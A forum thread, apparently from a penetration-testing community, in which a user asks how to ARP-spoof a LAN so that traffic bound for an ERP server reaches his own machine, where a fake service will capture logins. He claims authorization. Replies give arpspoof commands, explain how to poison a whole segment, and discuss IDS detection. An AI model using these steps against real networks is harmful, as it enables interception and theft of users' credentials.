Results 1 to 6 of 6

Thread: Arp poisoning / Redirecting to my own machine?

  1. #1
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24

    Default Arp poisoning / Redirecting to my own machine?

    Hi

    I need to arp poisoning / redirect clients in some how the traffic from the LAN goes to my own machine (not forward to just sniff). Let me explain, I'm inside a network and I want to setup a fake custom service (it's part from a ERP) to steal authentication.

    What's the problem?

    They do not use DNS queries to arrive at this server (they use direct IP).
    They do not use DHCP in this LAN.

    Is there a way I can impersonate local users (a kind of arp poison, etc) to make all requests that should go to server 10.0.0.2 (MAC 01:02:03:04:05:06) goes to my machines 10.0.0.26 (MAC 66:66:66:66:66:66) ? Yes, I do not want to forward the traffic, I want to bind a port and myself response to this services.

    Any ideas about how to do it in Windows or Linux?

    Thanks mates.

  2. #2
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Quote Originally Posted by The Dan View Post
    Hi

    I need to arp poisoning / redirect clients in some how the traffic from the LAN goes to my own machine (not forward to just sniff). Let me explain, I'm inside a network and I want to setup a fake custom service (it's part from a ERP) to steal authentication.

    What's the problem?

    They do not use DNS queries to arrive at this server (they use direct IP).
    They do not use DHCP in this LAN.

    Is there a way I can impersonate local users (a kind of arp poison, etc) to make all requests that should go to server 10.0.0.2 (MAC 01:02:03:04:05:06) goes to my machines 10.0.0.26 (MAC 66:66:66:66:66:66) ? Yes, I do not want to forward the traffic, I want to bind a port and myself response to this services.

    Any ideas about how to do it in Windows or Linux?

    Thanks mates.
    Are you authorized to do so? Just wondering because stealing usernames and password sounds strange in the first place.
    Tiocfaidh ár lá

  3. #3
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24

    Default

    Hi KMDave

    How are you?

    Sure, I work for a security company and one of my jobs are internal penetration tests, as I already had explained it here in another post I was believing it was clear.

    Some evidences goes here:

    http://forums.remote-exploit.org/sho...t=16469&page=3

    http://forums.remote-exploit.org/showthread.php?t=17010

    Sorry if it was not clear since the first post.

    Related with the thread, someone have some suggestion for me?

    Thank you

  4. #4

    Default

    If you are on the same network segment as the victim, try using arpspoof.

    Good Luck...

  5. #5
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24

    Default

    Hi cybrsnpr

    Thank you for reply.

    I did think in use dsniff package (arpspoof) but I got no sucess. In theory I should only setup a one way arp spoof and disable ip_forward, not?

    Like this:

    arpspoof -t VictimIP IPofMachineIWantToBe
    echo 0 > /proc/sys/net/ipv4/ip_forward
    However in my tests it do not work, it poison (the arp entry in VictimIP is forged), but if I setup a service in my attacker machine and try to connect from the VictimIP it gives connection refused.

    off: Is there a way to use arpsoof to poison a entire segment (like a class C network) instead of a machine? I did look at man page and it do not say anything.

    Thank you in advance.

  6. #6
    Junior Member
    Join Date
    Jul 2007
    Posts
    71

    Default

    Quote Originally Posted by The Dan View Post
    off: Is there a way to use arpsoof to poison a entire segment (like a class C network) instead of a machine? I did look at man page and it do not say anything.

    Thank you in advance.
    Of course. Just don't supply a target with arpspoof.

    Edit: Forgot to mention: A segment arpspoof WILL set off a IDS if there is one on the network. Not sure of your contract terms, but can you be caught/blatantly obvious or do you need to remain stealthy? An arpspoof that big is a dead give away.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •